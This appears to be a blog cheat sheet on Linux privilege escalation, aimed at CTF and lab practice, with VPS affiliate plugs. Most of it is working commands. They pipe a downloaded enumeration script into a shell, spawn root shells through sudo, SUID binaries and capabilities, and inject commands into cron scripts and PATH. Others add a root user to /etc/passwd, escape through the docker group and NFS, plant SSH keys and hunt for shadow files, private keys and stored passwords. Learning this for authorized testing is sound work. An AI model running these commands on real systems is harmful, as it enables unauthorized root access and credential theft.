Linux privilege escalation is the step between getting a shell and owning the box. You land as www-data or a low-priv user — the goal is root. This cheat sheet covers every technique worth knowing in 2026, with commands you can run immediately.
Practice these techniques on a real machine. Vultr and DigitalOcean both offer $5–6/month VPS you can spin up, break, and destroy. Cheap, legal, and resets whenever you want.
Quick Enumeration First
Before you run any exploit, enumerate. You need to know what you’re working with.
# Who are you
id && whoami && hostname
# OS and kernel version
uname -a
cat /etc/os-release
cat /proc/version
# What can you run as sudo
sudo -l
# Current environment
env
echo $PATH
Automated Enumeration Tools
Don’t reinvent the wheel. These tools do the heavy lifting:
LinPEAS — most comprehensive, outputs color-coded findings
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Or transfer the file manually and run:
chmod +x linpeas.sh && ./linpeas.sh 2>/dev/null | tee /tmp/linpeas.out
LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh && ./LinEnum.sh -t
linux-exploit-suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh
Run at least LinPEAS on every box. It highlights the most critical findings in red.
1. Sudo Misconfigurations
The most common escalation path on CTFs and real boxes.
sudo -l
Sudo NOPASSWD
If you see something like:
(ALL) NOPASSWD: /usr/bin/vim
You can escalate:
sudo vim -c ':!/bin/bash'
GTFOBins
For every binary you can run as sudo, check GTFOBins for the escalation command.
Common examples:
# find
sudo find . -exec /bin/bash \; -quit
# less
sudo less /etc/passwd
# then type: !/bin/bash
# awk
sudo awk 'BEGIN {system("/bin/bash")}'
# python
sudo python3 -c 'import os; os.system("/bin/bash")'
# nmap (older versions)
sudo nmap --interactive
# then: !sh
# perl
sudo perl -e 'exec "/bin/bash";'
# ruby
sudo ruby -e 'exec "/bin/bash"'
# tar
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
# zip
sudo zip /tmp/nothing /etc/passwd -T --unzip-command="sh -c /bin/bash"
Sudo with Wildcard Abuse
If sudo allows a command with *:
# Example: sudo rsync * /tmp/
# Create file to trigger flag injection:
touch -- '--e sh /tmp/shell.sh'
2. SUID / SGID Binaries
SUID binaries run as the file owner (often root), regardless of who runs them.
# Find all SUID binaries
find / -perm -u=s -type f 2>/dev/null
# Find SGID binaries
find / -perm -g=s -type f 2>/dev/null
# Combined
find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
Look for anything non-standard. Common exploitable SUID binaries:
# bash with SUID
/bin/bash -p # -p preserves effective UID
# find with SUID
find . -exec /bin/bash -p \; -quit
# cp with SUID — overwrite /etc/passwd
cp /etc/passwd /tmp/passwd.bak
echo 'newroot:$(openssl passwd -1 password123):0:0:root:/root:/bin/bash' >> /tmp/passwd.bak
cp /tmp/passwd.bak /etc/passwd
su newroot
# vim with SUID
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
# nmap with SUID (old versions)
nmap --interactive
!sh
# python with SUID
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
3. Cron Jobs
Scheduled tasks running as root with writable scripts are gold.
# View system crontabs
cat /etc/crontab
ls -la /etc/cron*
cat /etc/cron.d/*
# View user crontabs
crontab -l
# Watch for processes spawned by cron (use pspy)
./pspy64
Download pspy (no root required, watches process events):
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64 && ./pspy64
Watch the output for root-owned cron jobs. If you see /opt/backup.sh running as UID 0, check:
ls -la /opt/backup.sh
# Is it world-writable?
If you can write to the script:
echo 'chmod +s /bin/bash' >> /opt/backup.sh
# Wait for cron to fire, then:
bash -p
PATH Injection via Cron
If a cron script calls binaries without full paths:
# /opt/cleanup.sh contains: rm -rf /tmp/cache
# PATH in crontab is something you can influence
# Create a fake 'rm' in a directory you control:
echo '#!/bin/bash' > /tmp/rm
echo 'chmod +s /bin/bash' >> /tmp/rm
chmod +x /tmp/rm
# If you can prepend /tmp to the cron PATH...
4. Writable /etc/passwd
If /etc/passwd is world-writable, you can add a root-level user directly.
ls -la /etc/passwd
# Generate password hash
openssl passwd -1 -salt salt password123
# or
python3 -c "import crypt; print(crypt.crypt('password123', crypt.mksalt(crypt.METHOD_SHA512)))"
# Add entry
echo 'hacker:$1$salt$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker
5. Kernel Exploits
Last resort. Kernel exploits are noisy and can crash systems.
uname -r
# Check against CVE databases and exploit-db
# Run linux-exploit-suggester for automated recommendations
./linux-exploit-suggester.sh
Notable recent kernel vulns to know:
- DirtyPipe (CVE-2022-0847) — overwrite read-only files, Linux 5.8-5.16
- PwnKit (CVE-2021-4034) — pkexec local privilege escalation, basically universal
- DirtyCow (CVE-2016-5195) — old but still present on unpatched systems
# PwnKit — if pkexec is present and unpatched
# Check version: pkexec --version
# Exploit available on github: ly4k/PwnKit
# DirtyPipe (CVE-2022-0847)
# Check kernel: uname -r (needs 5.8-5.16.11)
# Exploit: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
Always test on a throwaway instance first. Vultr is good for this — spin up a matching kernel version, test your exploit, then run it for real.
6. PATH Hijacking
If a SUID binary or root-owned script calls system commands without full paths:
# Strings the binary to see what it calls
strings /usr/local/bin/backup
# Output: "cp /var/backup..."
# 'cp' is called without full path
# Create a malicious 'cp' in /tmp
echo '#!/bin/bash' > /tmp/cp
echo 'chmod +s /bin/bash' >> /tmp/cp
chmod +x /tmp/cp
# Prepend /tmp to PATH
export PATH=/tmp:$PATH
# Run the vulnerable binary
/usr/local/bin/backup
# Pop root shell
/bin/bash -p
7. Capabilities
Linux capabilities are a granular way to assign root-level privileges to specific binaries. Often misconfigured.
# Find binaries with capabilities
getcap -r / 2>/dev/null
Common dangerous capabilities:
# cap_setuid+ep on python3
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# cap_setuid on perl
perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash";'
# cap_net_raw on tcpdump — sniff as non-root
tcpdump -i eth0
# cap_dac_override — bypass file permission checks
# Can read/write any file
# cap_sys_admin — very powerful, near-root
8. NFS No_root_squash
If a remote NFS share has no_root_squash, files you create as root on your machine will be owned by root on the target.
# Check NFS shares on target
cat /etc/exports
showmount -e localhost
# If you see: /share *(rw,no_root_squash)
# Mount on attacker machine:
mount -t nfs target_ip:/share /mnt/nfs
# Create SUID binary on attacker:
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
# On target:
/share/bash -p
9. Docker / Container Escape
If the current user is in the docker group:
# Check groups
id
# If docker group is present:
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
You’re now root inside the container with the host filesystem mounted at /mnt. You can read /etc/shadow, add SSH keys, etc.
# Add your SSH key to root's authorized_keys
mkdir -p /mnt/root/.ssh
echo 'your-public-key' >> /mnt/root/.ssh/authorized_keys
chmod 600 /mnt/root/.ssh/authorized_keys
10. Weak File Permissions
Check for readable sensitive files and writable system files.
# World-writable files (excluding /proc, /sys, /dev)
find / -writable -type f 2>/dev/null | grep -v proc | grep -v sys | grep -v dev
# Readable shadow file
cat /etc/shadow
# SSH keys readable
find / -name "id_rsa" 2>/dev/null
find / -name "*.pem" 2>/dev/null
# Config files with credentials
find / -name "*.conf" -readable 2>/dev/null | xargs grep -l "password" 2>/dev/null
find / -name "*.env" -readable 2>/dev/null
find / -name "wp-config.php" -readable 2>/dev/null
11. Service and Process Enumeration
Look for services running as root that have known exploits or weak configs.
# Running processes
ps aux
ps aux | grep root
# Listening services (may expose internal ports not visible externally)
netstat -tlnp 2>/dev/null || ss -tlnp
netstat -anp 2>/dev/null
# Services configuration
ls /etc/systemd/system/
cat /etc/systemd/system/*.service 2>/dev/null | grep -i exec
12. Stored Credentials and History
People put passwords in bash history and config files constantly.
# Command history
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
# Look for credentials in common locations
grep -ri "password" /home/ 2>/dev/null
grep -ri "password" /var/www/ 2>/dev/null
grep -ri "passwd" /etc/ 2>/dev/null
# .env files
find / -name ".env" -readable 2>/dev/null | xargs cat 2>/dev/null
# SSH config
cat ~/.ssh/config
cat /etc/ssh/sshd_config
# Check last logins
last
lastlog
Quick Reference Table
| Technique | Check Command | Exploit When |
|---|---|---|
| Sudo misconfig | sudo -l | NOPASSWD entries exist |
| SUID binaries | find / -perm -u=s -type f 2>/dev/null | Non-standard SUID binary found |
| Writable cron | cat /etc/crontab; ./pspy64 | Root cron calls writable script |
| /etc/passwd writable | ls -la /etc/passwd | World-writable |
| Kernel exploit | uname -r + exploit-suggester | Matching CVE exists |
| PATH hijack | strings <suid-binary> | Relative binary calls found |
| Capabilities | getcap -r / 2>/dev/null | cap_setuid or similar |
| NFS squash | cat /etc/exports | no_root_squash present |
| Docker group | id | docker group membership |
| Weak perms | find / -writable -type f | Writable system files |
Methodology: What Order to Check
sudo -l— fastest win if NOPASSWD existsid— check for docker, lxd, adm, disk groups- LinPEAS — let it find what you missed
- SUID/SGID — GTFOBins lookup
- Cron jobs + pspy — watch for processes
- Capabilities — often overlooked
- Kernel version — exploit-suggester as last resort
- Manual config/credential hunting
Practice Environments
The fastest way to get good at privesc is volume. Do 5–10 boxes specifically focused on Linux privesc.
CTF Platforms:
- HackTheBox — Linux privesc boxes in the “Starting Point” track
- TryHackMe — dedicated Linux PrivEsc rooms (free tier available)
- PentesterLab — structured labs with write-ups
Your Own Lab: Spin up a VPS, intentionally misconfigure it, and practice. Vultr starts at $6/month. DigitalOcean is similar. Both give you a clean Ubuntu/Debian/CentOS environment in under 60 seconds.
Don’t just read this cheat sheet — run these commands until they’re muscle memory.
Further Reading
- GTFOBins — the authority on binary-based escalation
- PayloadsAllTheThings - Linux PrivEsc
- HackTricks Linux PrivEsc
Need this written up as a full pentest report or a custom security assessment? CipherWrite delivers professional-grade cybersecurity content — guides, whitepapers, and technical reports.